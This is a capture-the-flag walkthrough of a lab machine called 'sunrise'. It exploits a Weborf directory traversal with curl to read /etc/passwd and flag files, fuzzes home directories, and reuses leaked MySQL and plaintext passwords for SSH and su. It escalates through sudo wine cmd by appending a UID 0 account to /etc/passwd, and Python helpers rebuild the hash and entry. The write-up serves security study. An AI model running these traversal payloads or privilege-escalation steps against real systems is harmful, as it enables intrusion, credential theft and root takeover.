Port recognition with nmap

┌──(root@ghost)-[/home/ghost]
└─# nmap -v -p- --open --min-rate 5000 sunrise.vuln -sV
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-29 12:50 EST
Scanning sunrise.vuln (10.0.2.63) [65535 ports]
Discovered open port 8080/tcp on 10.0.2.63
Discovered open port 22/tcp on 10.0.2.63
Discovered open port 3306/tcp on 10.0.2.63
Discovered open port 80/tcp on 10.0.2.63
Completed SYN Stealth Scan at 12:50, 1.47s elapsed (65535 total ports)
Not shown: 65531 closed tcp ports (reset)
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp   open  http       nginx 1.14.2
3306/tcp open  mysql?
8080/tcp open  http-proxy Weborf (GNU/Linux)
┌──(root@ghost)-[/home/ghost]
└─# whatweb http://sunrise.vuln:8080
http://sunrise.vuln:8080 [200 OK] Country[RESERVED][ZZ], HTTPServer[Linux][Weborf (GNU/Linux)], IP[10.0.2.63], Title[Weborf]

Visiting http://sunrise.vuln:8080 in a browser shows the footer 'Generated by Weborf/0.12.2 (GNU/Linux)', which gives us the exact version to search for.

┌──(root@ghost)-[/home/ghost]
└─# searchsploit weborf
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                                                                                                    |  Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
weborf 0.12.2 - Directory Traversal                                                                                                                               | linux/remote/14925.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
┌──(root@ghost)-[/home/ghost]
└─# cat /usr/share/exploitdb/exploits/linux/remote/14925.txt
Title: Weborf httpd <= 0.12.2 Directory Traversal Vulnerability
Date: Sep 6, 2010
Author: Rew
Link: http://galileo.dmi.unict.it/wiki/weborf/doku.php
Version: 0.12.2
Tested On: Debian 5
CVE: N/A

=============================================================

Weborf httpd <= 0.12.2 suffers a directory traversal
vulnerability.  This vulnerability could allow
attackers to read arbitrary files and hak th3 plan3t.

instance.c : line 240-244
------------------------------
void modURL(char* url) {
    //Prevents the use of .. to access the whole filesystem  <-- ORLY?
    strReplace(url,"../",'\0');

    replaceEscape(url);
------------------------------

Exploit: GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

==============================================================

Stay safe,
Over and Out
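To see why the published bypass works, here is an added example (not weborf's code and not from the original write-up) that mirrors modURL()'s order of operations in Python beside a fixed resolver. The web root /var/www/html and the single-pass replace are assumptions for the demo; the point is that the literal "../" strip runs before the percent-decode, so "..%2f" survives the filter and becomes "../" afterwards.

```python
"""Added example: why stripping "../" before percent-decoding fails, and a fix."""
import posixpath
from urllib.parse import unquote

DOCROOT = "/var/www/html"  # assumed web root for the demo


def weborf_modurl(url: str) -> str:
    """Mirror of the vulnerable order of operations in Weborf's modURL():
    delete literal "../" first, decode escapes afterwards.  An encoded
    "..%2f" contains no literal "../", survives the strip, and only turns
    into "../" once the decode runs.  (Single-pass replace is an assumption.)"""
    stripped = url.replace("../", "")
    return unquote(stripped)


def resolve_vulnerable(url: str) -> str:
    """Filesystem path the vulnerable server ends up opening."""
    return posixpath.normpath(DOCROOT + "/" + weborf_modurl(url).lstrip("/"))


def resolve_fixed(url: str):
    """Decode first (until stable, to catch double encoding), normalise, then
    enforce that the result is still under DOCROOT.  Returns None on rejection."""
    decoded = url
    for _ in range(4):
        again = unquote(decoded)
        if again == decoded:
            break
        decoded = again
    if "\x00" in decoded:
        return None  # a NUL would truncate the C string at open()
    full = posixpath.normpath(posixpath.join(DOCROOT, decoded.lstrip("/")))
    if full != DOCROOT and not full.startswith(DOCROOT + "/"):
        return None  # escaped the document root
    return full


if __name__ == "__main__":
    payload = "/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"
    print("vulnerable:", resolve_vulnerable(payload))
    print("fixed:     ", resolve_fixed(payload))
```

The fix is not a better blacklist: decode and canonicalise the request fully, then compare the result against the root you intend to serve from. Any check that runs on the still-encoded string can be bypassed with whatever encoding the later decode understands.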
┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
avahi:x:107:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:108:118::/var/lib/saned:/usr/sbin/nologin
colord:x:109:119:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:110:7:HPLIP system user,,,:/var/run/hplip:/bin/false
sunrise:x:1000:1000:sunrise,,,:/home/sunrise:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
uuidd:x:111:120::/run/uuidd:/usr/sbin/nologin
rtkit:x:112:121:RealtimeKit,,,:/proc:/usr/sbin/nologin
dnsmasq:x:113:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
pulse:x:114:122:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
geoclue:x:116:124::/var/lib/geoclue:/usr/sbin/nologin
tss:x:117:125:TPM2 software stack,,,:/var/lib/tpm:/bin/false
speech-dispatcher:x:118:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
lightdm:x:120:127:Light Display Manager:/var/lib/lightdm:/bin/false
weborf:x:1001:1001:,,,:/home/weborf:/bin/bash
mysql:x:121:128:MySQL Server,,,:/nonexistent:/bin/false

Weborf also serves directory listings, so in a browser the same traversal lets us browse folders outside the web root and pull files directly.

┌──(root@ghost)-[/home/ghost]
└─# curl http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fsunrise%2fuser.txt
a6050aecf6303b0b824038807d823a89

That gives us the user flag without a shell on the box.

┌──(root@ghost)-[/home/ghost]
└─# wfuzz -t 100 -c --hc=404 -w /usr/share/dirb/wordlists/common.txt -u "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ"
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2fFUZZ
Total requests: 4614

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000001:   200        2 L      18 W       439 Ch      "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f"                                                     
000000003:   200        113 L    483 W      3526 Ch     ".bashrc"                                                                                                                          
000000016:   200        2 L      8 W        83 Ch       ".mysql_history"                                                                                                                   
000000019:   200        27 L     130 W      807 Ch      ".profile"

Fuzzing the weborf user's home directory through the traversal turns up a world-readable .mysql_history file.

┌──(root@ghost)-[/home/ghost]
└─# curl "http://sunrise.vuln:8080/..%2f..%2f..%2f..%2f..%2f..%2f..%2fhome%2fweborf%2f.mysql_history"
show databases;
ALTER USER 'weborf'@'localhost' IDENTIFIED BY 'iheartrainbows44';

That is a credential for the local MariaDB instance. Passwords are often reused, so we try it for SSH as weborf.

┌──(root@ghost)-[/home/ghost]
└─# ssh weborf@sunrise.vuln
weborf@sunrise.vuln's password: 
Linux sunrise 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec  5 16:24:32 2019 from 192.168.1.146
weborf@sunrise:~$ 

We now have a shell as weborf. The database account was created as 'weborf'@'localhost', so we connect to MariaDB from this shell on the target rather than over the exposed 3306 port.

┌──(root@ghost)-[/home/ghost]
└─# mysql mysql -u weborf -p
Enter password: 
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MariaDB connection id is 69
Server version: 10.3.18-MariaDB-0+deb10u1 Debian 10

Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MariaDB [(none)]> select User,Password from mysql.user;
+---------+-------------------------------------------+
| User    | Password                                  |
+---------+-------------------------------------------+
| root    | *C7B6683EEB8FF8329D8390574FAA04DD04B87C58 |
| sunrise | thefutureissobrightigottawearshades       |
| weborf  | *A76018C6BB42E371FD7B71D2EC6447AE6E37DB28 |
+---------+-------------------------------------------+

Going through the mysql.user table we find the sunrise user's password stored in clear text; the Password column should only ever hold a hash.
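Before trying a recovered password elsewhere it is worth confirming it actually matches the stored hash. The following added example (not from the original write-up) implements MariaDB's mysql_native_password scheme, which is what the '*' + 40 hex characters in the dump are, and triages the dumped rows: entries that are not hashes at all are flagged as plaintext, and hashed entries are checked against a candidate list such as the password found in .mysql_history. The row list is constructed from the table above, not a live query.

```python
"""Added example: triage a mysql.user dump and verify a recovered password."""
import hashlib


def mysql_native_password(password: str) -> str:
    """mysql_native_password hash: '*' + SHA1(SHA1(password)) in upper-case hex."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def looks_like_native_hash(value: str) -> bool:
    """True for the 41-character '*' + hex form; anything else was stored raw."""
    return (len(value) == 41 and value[0] == "*"
            and all(c in "0123456789ABCDEF" for c in value[1:]))


# Rows as dumped from mysql.user on the page (constructed list, not a live query).
MYSQL_USER_ROWS = [
    ("root",    "*C7B6683EEB8FF8329D8390574FAA04DD04B87C58"),
    ("sunrise", "thefutureissobrightigottawearshades"),
    ("weborf",  "*A76018C6BB42E371FD7B71D2EC6447AE6E37DB28"),
]


def triage(rows, candidates):
    """Classify each row as plaintext (not a hash at all), cracked (one of the
    candidate passwords hashes to it) or unknown.  Returns {user: (status, secret)}."""
    table = {mysql_native_password(c): c for c in candidates}
    findings = {}
    for user, stored in rows:
        if not looks_like_native_hash(stored):
            findings[user] = ("plaintext", stored)
        elif stored in table:
            findings[user] = ("cracked", table[stored])
        else:
            findings[user] = ("unknown", None)
    return findings


if __name__ == "__main__":
    # Candidates: the password from .mysql_history plus the plaintext value
    # found in the table itself (people reuse both).
    found = triage(MYSQL_USER_ROWS,
                   ["iheartrainbows44", "thefutureissobrightigottawearshades"])
    for user, (status, secret) in found.items():
        print(f"{user:8} {status:9} {secret or ''}")
```

The weborf row should come back as cracked with the .mysql_history password unless it was rotated after that ALTER USER; the sunrise row is reported as plaintext straight away because it is not in hash form at all.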

weborf@sunrise:~$ su sunrise
Password: 
sunrise@sunrise:/home/weborf$

With that password we can switch to the sunrise user.

sunrise@sunrise:/home/weborf$ sudo -l
[sudo] password for sunrise: 
Matching Defaults entries for sunrise on sunrise:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sunrise may run the following commands on sunrise:
    (root) /usr/bin/wine

sunrise is allowed to run /usr/bin/wine as root through sudo, and wine will happily run cmd for us.

sunrise@sunrise:/home/weborf$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)

Z:\home\weborf>type Z:\root\root.txt
            ^^                   @@@@@@@@@
       ^^       ^^            @@@@@@@@@@@@@@@
                            @@@@@@@@@@@@@@@@@@              ^^
                           @@@@@@@@@@@@@@@@@@@@
 ~~~~ ~~ ~~~~~ ~~~~~~~~ ~~ &&&&&&&&&&&&&&&&&&&& ~~~~~~~ ~~~~~~~~~~~ ~~~
 ~         ~~   ~  ~       ~~~~~~~~~~~~~~~~~~~~ ~       ~~     ~~ ~
   ~      ~~      ~~ ~~ ~~  ~~~~~~~~~~~~~ ~~~~  ~     ~~~    ~ ~~~  ~ ~~
   ~  ~~     ~         ~      ~~~~~~  ~~ ~~~       ~~ ~ ~~  ~~ ~
 ~  ~       ~ ~      ~           ~~ ~~~~~~  ~      ~~  ~             ~~
       ~             ~        ~      ~      ~~   ~             ~

Thanks for playing! - Felipe Winsnes (@whitecr0wz)

24edb59d21c273c033aa6f1689b0b18c

And that is the root flag.

The wine cmd is running as root, so instead of staying inside the emulated shell we can use it to append a new UID 0 account to /etc/passwd and then su to that account for a real root shell.

┌──(root@ghost)-[/home/ghost]
└─# openssl passwd -1 -salt ghost root
$1$ghost$hei4EuMz/wBkKFXDT2bQT0

Generating an MD5-crypt ($1$) hash of the password 'root' for the new account

┌──(root@ghost)-[/home/ghost]
└─# cat gowcroot.bat
echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd

Wine payload. echo|set /p= is used instead of a plain echo because cmd's echo terminates the line with CRLF, and a stray \r would end up in the shell field of the new entry.

sunrise@sunrise:~$ sudo -u root /usr/bin/wine cmd
Microsoft Windows 5.2.3790 (4.0)

Z:\home\sunrise>echo|set /p=ghost:$1$ghost$hei4EuMz/wBkKFXDT2bQT0:0:0:root:/root:/bin/bash>>\etc\passwd

Z:\home\sunrise>exit
sunrise@sunrise:~$ su ghost
Password: 
root@sunrise:/home/sunrise#

And we are root.
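The whole privilege-escalation step, reproduced as an added example in Python (not from the original write-up): the MD5-crypt hash that openssl passwd -1 produces, the /etc/passwd line built from it with a field check, and the difference between what cmd's plain echo and echo|set /p= would append. The account name ghost, salt ghost and password root are the values used above.

```python
"""Added example: MD5-crypt hash and /etc/passwd entry for the wine escape."""
import hashlib

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _to64(value: int, count: int) -> str:
    out = []
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password: str, salt: str) -> str:
    """Traditional MD5-crypt ($1$), the same scheme as `openssl passwd -1 -salt SALT PASS`."""
    pw, sl, magic = password.encode(), salt.encode()[:8], b"$1$"
    ctx = hashlib.md5(pw + magic + sl)
    alt = hashlib.md5(pw + sl + pw).digest()
    n = len(pw)
    while n > 0:                       # mix in the alternate sum, 16 bytes per block
        ctx.update(alt[:min(16, n)])
        n -= 16
    n = len(pw)
    while n:                           # one byte per bit of the password length
        ctx.update(b"\x00" if n & 1 else pw[:1])
        n >>= 1
    final = ctx.digest()
    for i in range(1000):              # stretching rounds
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(sl)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(_to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
                      for a, b, c in groups)
    encoded += _to64(final[11], 2)
    return "$1$" + sl.decode() + "$" + encoded


def passwd_entry(name, pw_hash, uid=0, gid=0, gecos="root", home="/root", shell="/bin/bash"):
    """Build the seven-field line, refusing characters that would break the format."""
    fields = [name, pw_hash, str(uid), str(gid), gecos, home, shell]
    for f in fields:
        if any(ch in f for ch in ":\r\n\x00"):
            raise ValueError(f"illegal character in field {f!r}")
    return ":".join(fields)


def cmd_echo(text: str) -> str:
    """What `echo text>>file` appends from cmd: the line plus CRLF."""
    return text + "\r\n"


def cmd_set_p(text: str) -> str:
    """What `echo|set /p=text>>file` appends: the line with no terminator at all."""
    return text


def shell_field(appended: str) -> str:
    """The shell getpwnam() would see for the appended entry (seventh field)."""
    return appended.split("\n")[0].split(":")[6]


if __name__ == "__main__":
    line = passwd_entry("ghost", md5crypt("root", "ghost"))
    print(line)
    print(repr(shell_field(cmd_echo(line))), repr(shell_field(cmd_set_p(line))))
```

On a current box you would normally generate a SHA-512 hash (openssl passwd -6) instead, but $1$ is still accepted by glibc's crypt and keeps the line short enough to type into wine's cmd. Appending a line to /etc/passwd is noisy: the file's mtime changes and the new UID 0 entry is trivial to spot, so on a real engagement note it in the report and remove it afterwards.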